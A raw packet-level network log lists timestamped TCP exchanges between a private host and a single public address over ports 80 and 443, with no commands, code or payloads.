                                                              Dec 19, 2024 22:40:07.259483099 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.259555101 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.259614944 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.261421919 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.261487007 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.261526108 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.263382912 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.263453007 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.263469934 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.265290022 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.265386105 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.265409946 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.267230034 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.267298937 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.267363071 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.269203901 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.269273043 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.269335985 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.271119118 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.271179914 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.271250010 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.273047924 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.273132086 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.273159027 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.274977922 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.275051117 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.275108099 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.319066048 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.378592014 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.378676891 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.378865957 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.379256010 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.379534960 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.379597902 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.380872965 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.381414890 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.381475925 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.381525993 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.382977962 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.383038998 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.383203030 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.384598970 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.384661913 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.385214090 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.386070013 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.386131048 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.386213064 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.387569904 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.387634039 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.387687922 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.389066935 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.389144897 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.389180899 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.390638113 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.390690088 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.390697956 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.391971111 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.392031908 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.392117977 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.393444061 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.393506050 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.393558979 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.395056963 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.395123005 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.395181894 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.396231890 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.396292925 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.396363974 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.397694111 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.397799015 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.397809982 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.399068117 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.399144888 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.399146080 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.400429964 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.400494099 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.400542021 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.401762962 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.401819944 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.401871920 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.403143883 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.403204918 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.403286934 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.404550076 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.404611111 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:34.593162060 CET49749443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:34.593206882 CET49749443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:34.647270918 CET49749443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:34.647345066 CET443497493.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:34.948191881 CET49750443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:34.948288918 CET443497503.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:34.948370934 CET49750443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:34.949016094 CET49750443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:34.949058056 CET443497503.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:36.379174948 CET443497503.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:36.383274078 CET49750443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:36.383739948 CET49750443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:36.383749962 CET443497503.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:36.386039019 CET49750443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:36.386043072 CET443497503.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:37.075550079 CET443497503.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:37.075609922 CET443497503.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:37.075660944 CET49750443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:37.075690031 CET443497503.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:37.075705051 CET49750443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:37.075747013 CET49750443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:37.075758934 CET443497503.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:37.075820923 CET49750443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:37.075913906 CET49750443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:37.075927019 CET443497503.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:37.181333065 CET49751443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:37.181422949 CET443497513.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:37.181556940 CET49751443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:37.181747913 CET49751443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:37.181772947 CET443497513.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:38.569422007 CET443497513.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:38.569564104 CET49751443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:38.570031881 CET49751443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:38.570059061 CET443497513.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:38.571574926 CET49751443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:38.571588039 CET443497513.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:39.261611938 CET443497513.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:39.261672974 CET443497513.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:39.261814117 CET443497513.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:39.261842012 CET49751443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:39.261842012 CET49751443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:39.261909962 CET49751443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:39.262043953 CET49751443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:39.262080908 CET443497513.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:39.367548943 CET49752443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:39.367677927 CET443497523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:39.367758036 CET49752443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:39.368138075 CET49752443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:39.368218899 CET443497523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:40.758049965 CET443497523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:40.758200884 CET49752443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:40.758650064 CET49752443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:40.758676052 CET443497523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:40.760643959 CET49752443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:40.760656118 CET443497523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:41.451102018 CET443497523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:41.451174974 CET443497523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:41.451204062 CET49752443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:41.451276064 CET443497523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:41.451356888 CET49752443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:41.451356888 CET49752443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:41.451359034 CET443497523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:41.451411009 CET49752443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:41.451498985 CET49752443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:41.451529026 CET443497523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:41.554796934 CET49753443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:41.554847956 CET443497533.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:41.554929972 CET49753443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:41.555121899 CET49753443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:41.555130959 CET443497533.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:42.945389032 CET443497533.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:42.945460081 CET49753443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:42.971417904 CET49753443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:42.971426964 CET443497533.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:42.986574888 CET49753443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:42.986582041 CET443497533.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:43.636950016 CET443497533.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:43.637011051 CET443497533.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:43.637016058 CET49753443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:43.637042999 CET443497533.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:43.637068033 CET49753443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:43.637088060 CET49753443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:43.637095928 CET443497533.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:43.637131929 CET49753443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:43.637182951 CET443497533.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:43.637228966 CET49753443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:43.637423038 CET49753443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:43.637438059 CET443497533.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:43.769764900 CET49754443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:43.769855976 CET443497543.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:43.769933939 CET49754443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:43.770472050 CET49754443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:43.770514011 CET443497543.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:45.164581060 CET443497543.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:45.164865971 CET49754443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:45.165153027 CET49754443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:45.165179968 CET443497543.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:45.167084932 CET49754443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:45.167138100 CET443497543.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:45.859103918 CET443497543.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:45.859164953 CET443497543.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:45.859345913 CET49754443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:45.859345913 CET49754443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:45.859411001 CET443497543.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:45.859452009 CET443497543.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:45.859481096 CET49754443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:45.859504938 CET49754443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:45.859545946 CET49754443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:45.859546900 CET49754443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:45.859576941 CET443497543.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:45.859647036 CET49754443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:45.976922035 CET49755443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:45.976960897 CET443497553.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:45.977041006 CET49755443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:45.977312088 CET49755443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:45.977324009 CET443497553.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:47.384468079 CET443497553.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:47.384557962 CET49755443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:47.384980917 CET49755443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:47.384988070 CET443497553.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:47.386466026 CET49755443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:47.386482954 CET443497553.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:48.078411102 CET443497553.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:48.078473091 CET443497553.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:48.078542948 CET49755443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:48.078567028 CET443497553.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:48.078598976 CET49755443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:48.078613043 CET443497553.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:48.078644991 CET49755443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:48.078690052 CET49755443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:48.078958035 CET49755443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:48.078972101 CET443497553.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:48.195451021 CET49756443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:48.195477962 CET443497563.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:48.195571899 CET49756443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:48.195770025 CET49756443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:48.195780993 CET443497563.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:49.594554901 CET443497563.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:49.594630003 CET49756443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:49.704161882 CET49756443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:49.704174995 CET443497563.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:49.705888987 CET49756443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:49.705893993 CET443497563.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:50.312987089 CET443497563.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:50.313045979 CET443497563.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:50.313097000 CET49756443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:50.313112020 CET443497563.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:50.313180923 CET49756443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:50.313215017 CET443497563.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:50.313282013 CET49756443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:50.313674927 CET49756443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:50.313685894 CET443497563.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:50.445632935 CET49757443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:50.445723057 CET443497573.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:50.445838928 CET49757443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:50.446084976 CET49757443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:50.446115017 CET443497573.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:51.835979939 CET443497573.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:51.836214066 CET49757443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:51.836555004 CET49757443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:51.836582899 CET443497573.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:51.838188887 CET49757443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:51.838203907 CET443497573.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:52.531388998 CET443497573.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:52.531450987 CET443497573.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:52.531647921 CET443497573.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:52.531694889 CET49757443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:52.531696081 CET49757443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:52.531773090 CET49757443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:52.532217026 CET49757443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:52.532280922 CET443497573.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:52.648772955 CET49758443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:52.648814917 CET443497583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:52.648885965 CET49758443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:52.649105072 CET49758443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:52.649111986 CET443497583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:54.044296980 CET443497583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:54.044513941 CET49758443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:54.044956923 CET49758443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:54.044962883 CET443497583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:54.046617031 CET49758443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:54.046622038 CET443497583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:54.750690937 CET443497583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:54.750751972 CET443497583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:54.750888109 CET443497583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:54.750901937 CET49758443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:54.750969887 CET49758443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:54.762325048 CET49758443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:54.762360096 CET443497583.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:55.218750000 CET49759443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:55.218862057 CET443497593.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:55.218977928 CET49759443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:55.219696045 CET49759443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:55.219739914 CET443497593.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:56.608226061 CET443497593.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:56.608326912 CET49759443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:56.608874083 CET49759443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:56.608918905 CET443497593.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:56.611011982 CET49759443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:56.611025095 CET443497593.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:57.299772978 CET443497593.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:57.299834967 CET443497593.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:57.299977064 CET443497593.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:57.299977064 CET49759443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:57.299977064 CET49759443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:57.300046921 CET49759443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:57.300091028 CET49759443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:57.300091028 CET49759443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:57.300132036 CET443497593.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:57.300201893 CET49759443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:57.459274054 CET49760443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:57.459393024 CET443497603.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:57.459711075 CET49760443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:57.468219042 CET49760443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:57.468297958 CET443497603.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:58.859622955 CET443497603.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:58.859822035 CET49760443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:58.860333920 CET49760443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:30.693746090 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:30.694230080 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:30.694236994 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:30.696263075 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:30.696268082 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.386111021 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.386177063 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.386204004 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.386219978 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.386233091 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.386276960 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.386282921 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.386320114 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.386336088 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.386393070 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.386629105 CET49840443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.386641026 CET443498403.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.492659092 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.492744923 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:31.492993116 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.493105888 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:31.493141890 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:32.903295040 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:32.903440952 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:32.903892040 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:32.903918982 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:32.905551910 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:32.905565977 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.600423098 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.600480080 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.600502014 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.600533962 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.600552082 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.600588083 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.600595951 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.600635052 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.600660086 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.600718021 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.600744009 CET49846443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.600755930 CET443498463.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.711617947 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.711656094 CET443498523.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:41:33.711745024 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.712002039 CET49852443192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:41:33.712018013 CET443498523.79.209.76192.168.2.4
